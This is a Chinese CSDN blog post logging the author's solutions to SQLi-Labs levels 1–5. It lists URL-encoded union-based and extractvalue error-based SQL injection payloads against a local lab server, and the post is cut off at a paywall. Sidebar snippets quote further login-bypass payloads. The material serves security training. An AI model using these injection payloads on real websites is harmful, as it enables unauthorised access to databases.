Sqli-Lab第一部分(Basic Challenges)练习记录(非讲解,个人记录用)

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量307 收藏
点赞数
分类专栏: Web安全 SQL注入 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Joker_York/article/details/107553806
版权

GET - Error based

1. Single quotes-String

http://192.168.205.128:8080/Less-1/?id=-1%27%20union%20select%201,2,database()%23

在这里插入图片描述

2. Intiger based

http://192.168.205.128:8080/Less-2/?id=-1%20union%20select%201,2,database()%23

在这里插入图片描述

3. Single quotes with twist-string

http://192.168.205.128:8080/Less-3/?id=-1%27)%20union%20select%201,2,database()%23
# 用单引号加括号闭合参数 ')

在这里插入图片描述

4. Double quotes-String

http://192.168.205.128:8080/Less-4/?id=-1%22)%20union%20select%201,2,database()%23
# 双引号加括号闭合参数 ")

在这里插入图片描述

GET - Double Injection

5. Single quotes - String

Double Injection指双查询注入,下面的参考链接讲得非常详细
参考链接:https://blog.csdn.net/wn314/article/details/89297560

http://192.168.205.128:8080/Less-5/?
id=-1%27%20union%20select%20extractvalue(0,concat(0x5C,%20(select%20database())))%23
# 这一段主要是利用读取xml的报错,extractvalue是读取xml,0指xml内容,concat()部分指指定xml的有效xpath,当xpath错误时会报错
# 正常extractvalue语句为:
mysql> select extractvalue('<a>123</a><b>456</b>', '/b');
+--------------------------------------------+
| extractvalue('<a>123</a><b>456</b>', '/b') |
+-----
最低0.47元/天 解锁文章
Joker_York
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs(1-22关)闯关笔记
weixin_43406687的博客
06-10 245
sqli-labs(1-22关)闯关笔记 一、Basic Challenges (以下为手工测试,也可以用工具Sqlmap,会提示可以用哪些注入攻击方法,如union、boolean、error、time) 1.1 Less-1 步骤1:?id=1’报错显示near ‘‘1’’ LIMIT 0,1’;id=1’and 1=1–+与id=1返回相同;id=1’and 1=2–+与id=1返回不相同。 步骤2:推断出为‘的字符型sql注入,id=1’ order by 3–+,得到该页面对应的数据库表格字段
SQLi_Labs-2.Basic Challenges
自强不息
01-16 236
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
chrome启动参数设置
热门推荐
厚Coming的专栏
06-06 8万+
chrome禁止本地浏览时加载本地其他文件,可以采用添加启动参数的方式来支持 添加参数为 --allow-file-access-from-files  或者 --disable-web-security Google Chrome 浏览器默认安装路径是 %USERPROFILE%\AppData\Local\Google\Chrome,其中User Data文件夹存放cache、
Mybatis 框架下 SQL 注入攻击的 3 种方式,真是防不胜防!
Java技术栈,分享最主流的Java技术
07-07 497
Java技术栈www.javastack.cn关注阅读更多优质文章本文授权转载请注明来自FreeBuf.COM链接:https://www.freebuf.com/vuls/240578...
SQLi-LABS Basic Challenges通关记录
qq_40481505的博客
10-14 297
Less-1 Error Based String Method 1:union注入 ?id= 1' --+ ?id=1' and 1=2 union select 1,2,3 --+ ?id=1' and 1=2 union select 1,2,database() --+ ?id=1' and 1=2 union select 1,2,group_concat(table_name) ...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
SQLi-LABS Page-1(Basic Challenges)1-22
SQLi-LABS Page-1(Basic Challenges)
07-24
在"SQLi-LABS Page-1 (Basic Challenges)"中,一系列的关卡设计用于帮助学习者理解并实践SQL注入的基本概念和方法。 在CTF(Capture The Flag)网络安全挑战赛中,SQL注入是一种常见的技能测试。在这个挑战中,从...
sql注入学习sqli-lab lesson1
qq_35661990的博客
05-09 1705
之前稍微接触了一下sqli-lab,但是没有继续学下去,最近刷了些web题,发现sqli-lab用来学习数据库和php语言挺有用的。将sqlilab搭在了phpstudy上后(文件解压到phpstudy下的WWW,然后添加站点,之后改host),开始第一课。先根据提示,在url后面加上?id=1(其中问号起到传递参数的作用)。可以看到返回了两个值,通过改变id的值,可以的得到不同的login na...
mysql注入天书(一)Basic Challenges
eWFuZw==的博客
09-06 821
【独家连载】mysql注入天书(一)Basic Challenges lcamry / 2016-1...
【项目杂记】跨域介绍及配置方式
A minor
02-16 426
跨域是对于 ajax 的限制,在浏览器上当前访问的网站向另一个网站发送请求获取数据的过程就是跨域请求,只有允许的域(Orgin)才可以调用服务端代码, 跨域是浏览器的同源策略决定的,是一个重要的浏览器安全策略,用于限制一个 origin 的文档或者它加载的脚本与另一个源的资源进行交互,它能够帮助阻隔恶意文档,减少可能被攻击的媒介,可以使用 CORS 配置解除这个限制。 关于跨域网上已经有很多解释,这里就不啰嗦,也可以直接看 MDN 的“浏览器的同源策略”文档进一步了解,这里就列举几个同源和不同源的例子,相信
phpmyadmin读取ubuntu服务器文件失败问题
include_heqile的博客
10-28 442
Ubuntu有一个特殊的防护机制,叫做Apparmor,可以使用这条命令来查看mysql是否位于防护应用列表中: sudo aa-status zx@ubuntu:/etc/apparmor.d$ sudo aa-status apparmor module is loaded. 24 profiles are loaded. 24 profiles are in enforce mode. ...
sqli-lab详解——做题笔记1-10(入门级注解)
Dream__Catcher的博客
10-09 2523
less-1 单引号报错注入 源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1 答案及解析: http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ or ‘1’=‘1 ’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行) ’ or 1=...
SQLI-LABS(Basic Challenges上)
yxl_d的博客
06-11 560
最近学习一下sql注入,领教一下Sqli-labs的魅力。 Sqli-labs下载 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) 打开界面: 尝试?id=1: 闭合符号一般是',",或无闭合符号或'),");注释符号为--+。 尝试?id=1': 很明显单引号闭合,再?id=1'--+注释掉后面的: 接下来就要判...
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4326
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 1068
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 432
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
sqli-lab第七关
07-28
对于sqli-lab的第七关,你可以尝试使用SQL注入来绕过身份验证,获取管理员权限。在用户名和密码输入框中,尝试输入以下的payload来进行注入: 用户名:admin' or 1=1-- 密码:任意密码 这个payload的作用是通过在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值